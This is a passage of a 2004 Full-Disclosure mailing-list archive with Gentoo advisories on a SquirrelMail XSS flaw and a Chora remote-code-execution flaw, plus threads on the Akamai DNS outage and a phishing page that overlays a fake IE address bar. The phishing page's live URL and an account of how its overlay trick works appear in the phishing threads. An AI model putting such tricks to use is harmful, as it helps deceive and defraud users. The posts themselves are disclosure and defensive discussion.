     anyone if they at least subscribe and never hit the
     queue. Lately we default to "delete" and try to approve
     those people who insist on posting without subscribing,
     or posting from a non-subscribed address. If "reputable"
     means bugtraq or cert then beat me with a stick.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

[Full-Disclosure] [ GLSA 200406-08 ] Squirrelmail: Another XSS vulnerability

From: Thierry Carrez (koongentoo.org)
Date: Tue Jun 15 2004 - 14:00:27 CDT

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200406-08
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: Squirrelmail: Another XSS vulnerability
      Date: June 15, 2004
      Bugs: #52434
        ID: 200406-08

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

Squirrelmail fails to properly sanitize user input, which could lead to
a compromise of webmail accounts.

Background
==========

SquirrelMail is a webmail package written in PHP. It supports IMAP and
SMTP, and can optionally be installed with SQL support.

Affected packages
=================

Description
===========

A new cross-site scripting (XSS) vulnerability in
Squirrelmail-1.4.3_rc1 has been discovered. In functions/mime.php
Squirrelmail fails to properly sanitize user input.

Impact
======

By enticing a user to read a specially crafted e-mail, an attacker can
execute arbitrary scripts running in the context of the victim's
browser. This could lead to a compromise of the user's webmail account,
cookie theft, etc.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All SquirrelMail users should upgrade to the latest stable version:

# emerge sync

# emerge -pv ">=mail-client/squirrelmail-1.4.3"
# emerge ">=mail-client/squirrelmail-1.4.3"

References
==========

  [ 1 ] RS-Labs Advisory
        http://www.rs-labs.com/adv/RS-Labs-Advisory-2004-1.txt
  [ 2 ] CERT description of XSS
        http://www.cert.org/advisories/CA-2000-02.html

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

http://security.gentoo.org/glsa/glsa-200406-08.xml

Concerns?
=========

License
=======

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/1.0

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFAz0dKvcL1obalX08RArFBAKCsBVql2MknZqBZZC1KEaoH+QEFrACdFk/U
PgBs0ZO8tIQBUD/TgHlCbRA=
=Qq1y
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Re: [Full-Disclosure] Yahoo upgraded all accounts to 100MB

From: randall (listsdomain-logic.com)
Date: Tue Jun 15 2004 - 14:28:19 CDT

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

At 11:35 AM 6/15/2004 -0500, you wrote:
>Perhaps it is for users who have been with Yahoo for a really long time? I
>just checked and mine has been upgraded to 100Mb.
>
>Actually, I wasn't too worried about it because for several months now
>their quota on my account has been broken! It always said 92% of capacity
>even when I knew I had well over the allotted quota.
>
>-joe
Go to mail.yahoo.com and see:
New to Yahoo?
<blah blah blah?
- 100MB of email storage
    Keep more of what's important to you
- Powerful spam protection
   Read only the mail you really want
- Get your mail anywhere
   All you need is a web connection
--
seems to be part of the basic offering.

Randall

Jesus is Coming! Look Busy!

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

[Full-Disclosure] [ GLSA 200406-09 ] Horde-Chora: Remote code execution

From: Thierry Carrez (koongentoo.org)
Date: Tue Jun 15 2004 - 14:07:19 CDT

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200406-09
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: High
     Title: Horde-Chora: Remote code execution
      Date: June 15, 2004
      Bugs: #53800
        ID: 200406-09

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

A vulnerability in Chora allows remote code execution and file upload.

Background
==========

Chora is a PHP-based SVN/CVS repository viewer by the HORDE project.

Affected packages
=================

Description
===========

A vulnerability in the diff viewer of Chora allows an attacker to
inject shellcode. An attacker can exploit PHP's file upload
functionality to upload a malicious binary to a vulnerable server,
chmod it as executable, and run the file.

Impact
======

An attacker could remotely execute arbitrary binaries with the
permissions of the PHP script, conceivably allowing further
exploitation of local vulnerabilities and remote root access.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All users are advised to upgrade to the latest version of Chora:

# emerge sync

# emerge -pv ">=net-www/horde-chora-1.2.2"
# emerge ">=net-www/horde-chora-1.2.2"

References
==========

[ 1 ] e-matters Advisory
http://security.e-matters.de/advisories/102004.html

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

http://security.gentoo.org/glsa/glsa-200406-09.xml

Concerns?
=========

License
=======

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/1.0

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFAz0jnvcL1obalX08RAu3JAJ9L4pPK9KWtHPjcRwboktaAiMWWrgCdH4N7
oa5ogvUu/JPTpvn0ZRasxo4=
=MW7j
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Re: [Full-Disclosure] antivirus and spyware scanning

From: randall (listsdomain-logic.com)
Date: Tue Jun 15 2004 - 14:36:10 CDT

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

At 09:43 AM 6/15/2004 -0700, you wrote:
> > I think it is very useful to scan a windows machine
> > from viruses while having that machine booted to
> > linux. This pretty much ensures that you will find
> > all the virii on that system.
>Not necessarily. You'll have to update the virus
>signatures on your CD distribution prior to scanning,
>and that doesn't guarantee complete coverage, either.
I like to just plug the box into my network (home or office)
and scan the entire drive from another box.

If you remove a known infected drive and actually place
it into your own machine, your system is venerable until
your Antivirus software shields are up and running.

Booting from a CD may require changing BIOS settings,
or the machine may be old enough (I still come across
companies running these) that will not boot from CD.

You can also carry along your laptop and crossover cable
to scan 'on the road' without much setup.

I think a more useful setup for me (on newer machines)
would be to create a Linux bootable USB thumbdrive that
I could boot and scan from. Updating signatures would
be trivial.

randall

Blaming guns for crime is like blaming a pencil for misspelled words

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Re: [Full-Disclosure] Akamai

From: james edwards (hackerwackercybermesa.com)
Date: Tue Jun 15 2004 - 15:44:45 CDT

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

> I've just been told that it was a DoS. No details.

Unlikely, Akamai is an overlay network & the root content node is not
reachable.
Akamai can in real time spread web traffic through out their global network
of
servers, diluting a DoS to the point it is not significant. It is more
likely that the
complexity of the overlay network was the cause. Last week it was a DNS
issue
and it seemed much the same this week. Provided you know the IP's of the
content servers
you would find they were still up. At least that was what I as seeing.

Here is some info on Overlay Networks:
http://nms.lcs.mit.edu/ron/
http://nms.lcs.mit.edu/ron/#papers

Dr. Andersons "Mayday: Distributed Filtering for Internet Services "
is quite interesting.
http://nms.lcs.mit.edu/papers/mayday-usits2003/paper.html

--
James H. Edwards
Routing and Security Administrator
At the Santa Fe Office: Internet at Cyber Mesa
jameshcybermesa.com
noccybermesa.com
(505) 795-7101

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

RE: [Full-Disclosure] Akamai

From: Brent Colflesh (Brent.ColfleshUlticom.com)
Date: Tue Jun 15 2004 - 16:30:19 CDT

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

"Young called it a "large scale, international attack on Internet
infrastructure." However, there was no evidence that non-Akamai
infrastructure was affected."

http://apnews.excite.com/article/20040615/D837KIU00.html

Regards,
Brent

-----Original Message-----
From: full-disclosure-adminlists.netsys.com
[mailto:full-disclosure-adminlists.netsys.com]On Behalf Of james
edwards
Sent: Tuesday, June 15, 2004 4:45 PM
To: full-disclosurelists.netsys.com
Subject: Re: [Full-Disclosure] Akamai

> I've just been told that it was a DoS. No details.

Here is some info on Overlay Networks:
http://nms.lcs.mit.edu/ron/
http://nms.lcs.mit.edu/ron/#papers

Dr. Andersons "Mayday: Distributed Filtering for Internet Services "
is quite interesting.
http://nms.lcs.mit.edu/papers/mayday-usits2003/paper.html

--
James H. Edwards
Routing and Security Administrator
At the Santa Fe Office: Internet at Cyber Mesa
jameshcybermesa.com
noccybermesa.com
(505) 795-7101

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Re: [Full-Disclosure] Akamai

scosolscosol.org
Date: Tue Jun 15 2004 - 16:37:24 CDT

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

james edwards wrote:
>>I've just been told that it was a DoS. No details.
>
>
> Unlikely, Akamai is an overlay network & the root content node is not
> reachable.
> Akamai can in real time spread web traffic through out their global network
> of
> servers, diluting a DoS to the point it is not significant. It is more
> likely that the
> complexity of the overlay network was the cause. Last week it was a DNS
> issue
> and it seemed much the same this week.

I don't think so- yeah a DOS against the content nodes isn't gonna do
much but a DOS against their nameservers is fully workable.

--
"jupiter accepts your offer"
AIM: IMFDUP
http://www.scosol.org/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

RE: [Full-Disclosure] Akamai

From: Chris Carlson (chriscompucounts.com)
Date: Tue Jun 15 2004 - 16:47:07 CDT

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

http://www.washingtonpost.com/wp-dyn/articles/A43635-2004Jun15.html

Need to register, but it's no hassle.
I'd mirror to my server, but copyright blah blah blah.

Anyone have any more info?

> -----Original Message-----
> From: full-disclosure-adminlists.netsys.com
> [mailto:full-disclosure-adminlists.netsys.com] On Behalf Of
> james edwards
> Sent: Tuesday, June 15, 2004 16:45
> To: full-disclosurelists.netsys.com
> Subject: Re: [Full-Disclosure] Akamai
>
> > I've just been told that it was a DoS. No details.
>
> Unlikely, Akamai is an overlay network & the root content
> node is not reachable.
> Akamai can in real time spread web traffic through out their
> global network of servers, diluting a DoS to the point it is
> not significant. It is more likely that the complexity of the
> overlay network was the cause. Last week it was a DNS issue
> and it seemed much the same this week. Provided you know the
> IP's of the content servers you would find they were still
> up. At least that was what I as seeing.
>
> Here is some info on Overlay Networks:
> http://nms.lcs.mit.edu/ron/
> http://nms.lcs.mit.edu/ron/#papers
>
> Dr. Andersons "Mayday: Distributed Filtering for Internet Services "
> is quite interesting.
> http://nms.lcs.mit.edu/papers/mayday-usits2003/paper.html
>
> --
> James H. Edwards
> Routing and Security Administrator
> At the Santa Fe Office: Internet at Cyber Mesa
> jameshcybermesa.com noccybermesa.com
> (505) 795-7101
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
>
>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Re: [Full-Disclosure] Akamai

From: Ben Nelson (listsvenom600.org)
Date: Tue Jun 15 2004 - 16:44:29 CDT

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Keep in mind that the term 'DOS' doesn't necessarily mean 'flood of
traffic'. A denial of service is just that......a _denial of service_
by any means, and I'd say that there was definitlely some service being
denied. Don't think so?.....ask Google or Yahoo.

- --Ben

james edwards wrote:
|>I've just been told that it was a DoS. No details.
|
|
| Unlikely, Akamai is an overlay network & the root content node is not
| reachable.
| Akamai can in real time spread web traffic through out their global
network
| of
| servers, diluting a DoS to the point it is not significant. It is more
| likely that the
| complexity of the overlay network was the cause. Last week it was a DNS
| issue
| and it seemed much the same this week. Provided you know the IP's of the
| content servers
| you would find they were still up. At least that was what I as seeing.
|
| Here is some info on Overlay Networks:
| http://nms.lcs.mit.edu/ron/
| http://nms.lcs.mit.edu/ron/#papers
|
| Dr. Andersons "Mayday: Distributed Filtering for Internet Services "
| is quite interesting.
| http://nms.lcs.mit.edu/papers/mayday-usits2003/paper.html
|
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (GNU/Linux)

iD8DBQFAz2293cL8qXKvzcwRAljLAJ9cRyIW3pK0pGgjwVjkO8RXhztMwwCg8ql6
hqZiM20cOQ6cdosafHeexic=
=YmGu
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Re: [Full-Disclosure] US Bank scam

From: Hamby, Charles D. (pfcdh1matsu.alaska.edu)
Date: Tue Jun 15 2004 - 16:54:57 CDT

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This is a slick phishing scam, I have to admit. One thing I noticed
though;
I printed the various pages of the website out with IE to use as an
example and I noticed that the real URL appeared at the bottom of each
page as opposed to the bogus one. I thought that was interesting. Has
anyone else
noticed that this occurs with other phishing sites or is it just unique
to this case?

Charles Hamby

-----Original Message-----
From: full-disclosure-adminlists.netsys.com
[mailto:full-disclosure-adminlists.netsys.com] On Behalf Of Eric
LeBlanc
Sent: Tuesday, June 15, 2004 9:59 AM
To: full-disclosurelists.netsys.com
Subject: [SPAM] - Re: [Full-Disclosure] US Bank scam - Email found in
subject

On Tue, 15 Jun 2004, David Lederman wrote:

> This is the best phishing scam I've seen yet:
> http://www.bis1bp.com/a12/index.html
>
> I have Windows Server 2003 fully patched and this works. The program
fakes an address bar so this
> would pass through most people's safety check, after all the address
bar clearly has the correct
> address.
>
> There are bugs in the code, for example, all your Internet Explorer
windows will now have this
> address, but again for most people would only have one window open.
>

If you have google's toolbar or something similar, it will overwrite
this
toolbar and not the address bar.

But, I must admit that this thing is ingenious !

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Re: [Full-Disclosure] Akamai

From: james edwards (hackerwackercybermesa.com)
Date: Tue Jun 15 2004 - 16:43:49 CDT

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Akamai is saying their DNS continued to work.

http://www.theregister.co.uk/2004/06/15/akamai_goes_postal/

Akamai has got back to us to explain that the problem stemmed from what a
spokesman called a "large scale international attack on the Internet's
infrastructure". Akamai said the attack was primarily aimed at the large
search engines - of which it runs the three largest, Yahoo!, Google and
Lycos - which meant that people were unable to access the sites.

The spokesman denied however that it was an outage and ****said that the
Akamai name service continued to function throughout the attack**** which
ended around two hours later.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

RE: [Full-Disclosure] US Bank scam

From: Peter B. Harvey (Information Security) (peterharveyemergency.qld.gov.au)
Date: Tue Jun 15 2004 - 17:30:47 CDT

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Couple of notes,

First the page is not encrypted.

Second the overlay stays on top when you switch windows. At the moment it is sitting in the middle of the email i am typing.

However a novice to computer scams could be fooled quite easily by this. Impressive.

Peter
____________________________________________
Peter Harvey
Information Security Officer
Dept. Emergency Services - QLD
Phone: +61 7 3109 7292
____________________________________________

-----Original Message-----
From: Eric LeBlanc [mailto:inoukigt.net]
Sent: Wednesday, June 16, 2004 3:59 AM
To: full-disclosurelists.netsys.com
Subject: Re: [Full-Disclosure] US Bank scam

On Tue, 15 Jun 2004, David Lederman wrote:

If you have google's toolbar or something similar, it will overwrite this
toolbar and not the address bar.

But, I must admit that this thing is ingenious !

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

This correspondence is for the named persons only.
It may contain confidential or privileged information or both.
No confidentiality or privilege is waived or lost by any mis transmission.
If you receive this correspondence in error please delete it from your system immediately and notify the sender.
You must not disclose, copy or relay on any part of this correspondence, if you are not the intended recipient.
Any opinions expressed in this message are those of the individual sender except where the sender expressly,
and with the authority, states them to be the opinions of the Department of Emergency Services, Queensland.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Re: [Full-Disclosure] Akamai

From: james edwards (hackerwackercybermesa.com)
Date: Tue Jun 15 2004 - 17:20:53 CDT

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

> "Young called it a "large scale, international attack on Internet
> infrastructure." However, there was no evidence that non-Akamai
> infrastructure was affected."
>
> http://apnews.excite.com/article/20040615/D837KIU00.html
>
> Regards,
> Brent

With an attack of this indicated size, there are always choke points
just prior to the DoS traffic hitting the intended hosts. These choke points
tend to be NAP's or IX'es. The real harm gets done at these points, where
the DoS converges. So far no one has spoken up on NANOG with issues
at NAP's or IX'es. With the last big DDoS of the DNS root's the roots never
when down;
it was the access points just prior to the root that took the beating. I had
no problems with
any east or west coast NAP's or IX'es this morning nor were any problems
reported on NANOG.

james

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Re: [Full-Disclosure] Akamai

From: james edwards (hackerwackercybermesa.com)
Date: Tue Jun 15 2004 - 18:06:54 CDT

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> Keep in mind that the term 'DOS' doesn't necessarily mean 'flood of
> traffic'. A denial of service is just that......a _denial of service_
> by any means, and I'd say that there was definitlely some service being
> denied. Don't think so?.....ask Google or Yahoo.
>
> - --Ben

Actually I did not sat this part:

>
> james edwards wrote:
> |>I've just been told that it was a DoS. No details.

I would agree that a DoS can be many things. But if you are able to read for
context
it is clear the below is speaking of a DoS in the flood of traffic context.

This part is me:

> |
> |
> | Unlikely, Akamai is an overlay network & the root content node is not
> | reachable.
> | Akamai can in real time spread web traffic through out their global
> network
> | of
> | servers, diluting a DoS to the point it is not significant. It is more
> | likely that the
> | complexity of the overlay network was the cause. Last week it was a DNS
> | issue
> | and it seemed much the same this week. Provided you know the IP's of the
> | content servers
> | you would find they were still up. At least that was what I as seeing.
> |
> | Here is some info on Overlay Networks:
> | http://nms.lcs.mit.edu/ron/
> | http://nms.lcs.mit.edu/ron/#papers
> |
> | Dr. Andersons "Mayday: Distributed Filtering for Internet Services "
> | is quite interesting.
> | http://nms.lcs.mit.edu/papers/mayday-usits2003/paper.html
> |
> -----BEGIN PGP SIGNATURE-----
> Version: GnuPG v1.2.4 (GNU/Linux)
>
> iD8DBQFAz2293cL8qXKvzcwRAljLAJ9cRyIW3pK0pGgjwVjkO8RXhztMwwCg8ql6
> hqZiM20cOQ6cdosafHeexic=
> =YmGu
> -----END PGP SIGNATURE-----
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Re: [Full-Disclosure] Akamai

From: james edwards (hackerwackercybermesa.com)
Date: Tue Jun 15 2004 - 18:21:07 CDT

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

>
> I don't think so- yeah a DOS against the content nodes isn't gonna do
> much but a DOS against their nameservers is fully workable.

Akamai seems to be saying the NS was functioning:

The spokesman denied however that it was an outage and ****said that the
Akamai name service continued to function throughout the attack**** which
ended around two hours later.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

RE: [Full-Disclosure] Akamai

From: Bob Beringer (bob.beringerusa.net)
Date: Tue Jun 15 2004 - 18:38:08 CDT

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

All,

Just found this site: http://bugmenot.com/
It will help you bypass registration, if you would like :-)

v/r
Bob Beringer

"Chris Carlson" <chriscompucounts.com> wrote:

http://www.washingtonpost.com/wp-dyn/articles/A43635-2004Jun15.html

Need to register, but it's no hassle.
I'd mirror to my server, but copyright blah blah blah.

Anyone have any more info?

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

RE: [Full-Disclosure] US Bank scam

From: Scott Dodson (sdodsonsdodson.com)
Date: Tue Jun 15 2004 - 18:24:54 CDT

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

-----Original Message-----
>From: full-disclosure-adminlists.netsys.com
[mailto:full-disclosure->adminlists.netsys.com] On Behalf Of David
Lederman
>Sent: Tuesday, June 15, 2004 12:30 PM
>To: full-disclosurelists.netsys.com
>Subject: [Full-Disclosure] US Bank scam
>
>This is the best phishing scam I've seen yet:
>http://www.bis1bp.com/a12/index.html
>
>I have Windows Server 2003 fully patched and this works. The program
fakes >an address bar so this
>would pass through most people's safety check, after all the address
bar >clearly has the correct
>address.

>There are bugs in the code, for example, all your Internet Explorer
windows >will now have this
>address, but again for most people would only have one window open.
>

With XP SP2 build 2149 (RC2) it shows up immediately below the address
bar.

http://www.sdodson.com/phishing.jpg for a view.

--
Scott

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

[Full-Disclosure] RE: Internet Explorer Remote Null Pointer Crash(mshtml.dll)

http-equivexcite.com
Date: Tue Jun 15 2004 - 19:12:11 CDT

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This is all incorrect.

1. Any unusual characters in a file name will automatically be
converted to random digits. This has been tested and
demonstrated since 2001.

2. 'Save target' and an invoked download whether automatic or
manually cannot be the same. Simple logic right click on a
15MB .mp3 and 'save target' and you don't wait hours for this
to occur. Neither does forcing the download which only downloads
the html or php or script or whatever trick is used initially to
auto download nor does directly invoking the download [clicking
on the file. Regardless of the way nothing is written.

3. Clearly what's being 'confused' here is with a frame which
does write the file and which cannot be combined with this
scenario for all the reasons above.

4. document.execCommand('SaveAs',false,'::%7b') also doesn't do
anything.

We may actually have to roll up our sleeves and get our soft
little hands dirty to solve this one what.

--
http://www.malware.com

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Re: [Full-Disclosure] US Bank scam

From: Nick FitzGerald (nickvirus-l.demon.co.uk)
Date: Tue Jun 15 2004 - 20:03:14 CDT

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

"Hamby, Charles D." <pfcdh1matsu.alaska.edu> wrote:

> This is a slick phishing scam, I have to admit. ...

It's been around for a month or more, so it may be slick, but it's not
new... Back on 13 May Drew Copley from eEye posted the following to
Bugtraq about it:

http://www.securityfocus.com/archive/1/363326

http://www.securityfocus.com/archive/1/363350

It is listed as BID 10346 at securityfocus:

http://www.securityfocus.com/bid/10346

> ... One thing I noticed
> though;
> I printed the various pages of the website out with IE to use as an
> example and I noticed that the real URL appeared at the bottom of each
> page as opposed to the bogus one. I thought that was interesting. Has
> anyone else
> noticed that this occurs with other phishing sites or is it just unique
> to this case?

For pity's sake -- did you not even look at the page sources to see how
it works??

It slaps a fake URL window over roughly the screen area where the real
URL is still displayed in the address bar. This is _NOT_ a case of
"true" spoofing (in the sense that the browser is fooled -- note for
one that the "https padlock" is not present; IE knows it is not at an
https URL), so why would you think that IE might print the "spoofed"
URL in printed headers/footers?

The spoofing here is of the social engineering type. Clearly all those
who have posted to the list so far commenting how effecitve this is are
not the types to immediately notice the horrible, and to me immediately
noticeable, two or three pixel offset of the faked URL window...

Finally, this is the kind of problem that is relatively easily guarded
against (though not entirely protected from) by running non-default
configurations. To the extent you have the Address bar in IE
positioned somewhere other than where the default locationj is, this
"trick" becomes horribly obvious, so long as your users have the
requisite clue count...

(And yes, there are other ways to do this that are not so easily fooled
as to show themselves by simply moving the Address bar, and these have
reputedly already been used in some phishing scams -- see commentary in
Drew's archived posts, linked above.)

--
Nick FitzGerald
Computer Virus Consulting Ltd.
Ph/FAX: +64 3 3529854

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Re: [Full-Disclosure] Akamai

From: scosol (scosolscosol.org)
Date: Tue Jun 15 2004 - 20:36:13 CDT

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

james edwards wrote:

>>I don't think so- yeah a DOS against the content nodes isn't gonna do
>>much but a DOS against their nameservers is fully workable.
>
>
> Akamai seems to be saying the NS was functioning:
>
> The spokesman denied however that it was an outage and ****said that the
> Akamai name service continued to function throughout the attack**** which
> ended around two hours later.

That's BS-

See these Symantec and Apple graphs- the outage was clearly at the DNS
level:

http://anon.scosol.speedera.net/anon.scosol/apple_outage.png
http://anon.scosol.speedera.net/anon.scosol/symantec_outage.png

It's my 24/7 job to monitor Akamai :)

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

RE: [Full-Disclosure] US Bank scam

From: Nick FitzGerald (nickvirus-l.demon.co.uk)
Date: Tue Jun 15 2004 - 20:54:04 CDT

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

"Scott Dodson" <sdodsonsdodson.com> wrote:

> With XP SP2 build 2149 (RC2) it shows up immediately below the address
> bar.

Yes -- XP SP2 includes a lot of fixes for IE, such as preventing it
drawing client windows over parts of the standard interface,
limitations on chromeless windows and so on...

--
Nick FitzGerald
Computer Virus Consulting Ltd.
Ph/FAX: +64 3 3529854

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Re: [Full-Disclosure] Akamai

From: Darren Reed (avaloncaligula.anu.edu.au)
Date: Tue Jun 15 2004 - 20:53:23 CDT

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

I curious to know if organised crime was involved or was it
some rogue hacker/group or just a technical glitch?

Reports say the attacked stopped after ~2 hours but why?

Someone must have "called it off" but in response to what?

If so, was it just a demonstration of "power" or something else?

After reading about extortion attempts by various groups that use
DoS tactics to impact web sales, clearly the nature of all DoS
attacks against large sites must be looked at in more depth to
get a good picture of what is happening.

This is a whole new play ground for organised crime, mostly thanks
to Microsoft. You've got millions of PC's around the world that
are largely, in one way or another, susceptible to computer virii,
making them open targets for use as minions. And the perfect seed
for spreading them is the databases of email addresses used by
spammers...

What's interesting is that in contrast to old-school protection
rackets, there appears to be no offering of protection from attack
by others.

Darren

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Re: [Full-Disclosure] Akamai

tcleary2csc.com.au
Date: Tue Jun 15 2004 - 23:55:23 CDT

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Darren Reed said:

>What's interesting is that in contrast to old-school protection
>rackets, there appears to be no offering of protection from attack
>by others.

IIRC the main purpose of DoS attacks ( apart from kiddie fights )
is to allow a trust exploit/MITM to succeed - e.g. session hijacking.

Maybe someone wanted to plant something by pretending to be the
WindowsUpdate site?

If you're akamamai'd, poisoning DNS would be harder, but changing
IP address wouldn't seem unusual, would it?

Regards,

tom.

----------------------------------------------------------------------------------------
Tom Cleary - Security Architect

"In IT, acceptable solutions depend upon humans - Computers don't
negotiate."
----------------------------------------------------------------------------------------
This is a PRIVATE message. If you are not the intended recipient, please
delete without copying and kindly advise us by e-mail of the mistake in
delivery. NOTE: Regardless of content, this e-mail shall not operate to
bind CSC to any order or other contract unless pursuant to explicit
written agreement or government initiative expressly permitting the use of
e-mail for such purpose.
----------------------------------------------------------------------------------------

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

RE: [Full-Disclosure] US Bank scam

wszumeraborgwarner.com
Date: Tue Jun 15 2004 - 23:37:54 CDT

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

> -----Original Message-----
> From: David Lederman [mailto:delphi4proyahoo.com]
> Sent: Tuesday, June 15, 2004 12:30 PM
> To: full-disclosurelists.netsys.com
> Subject: [Full-Disclosure] US Bank scam
>
>
> This is the best phishing scam I've seen yet:
> http://www.bis1bp.com/a12/index.html
>
> I have Windows Server 2003 fully patched and this works. The
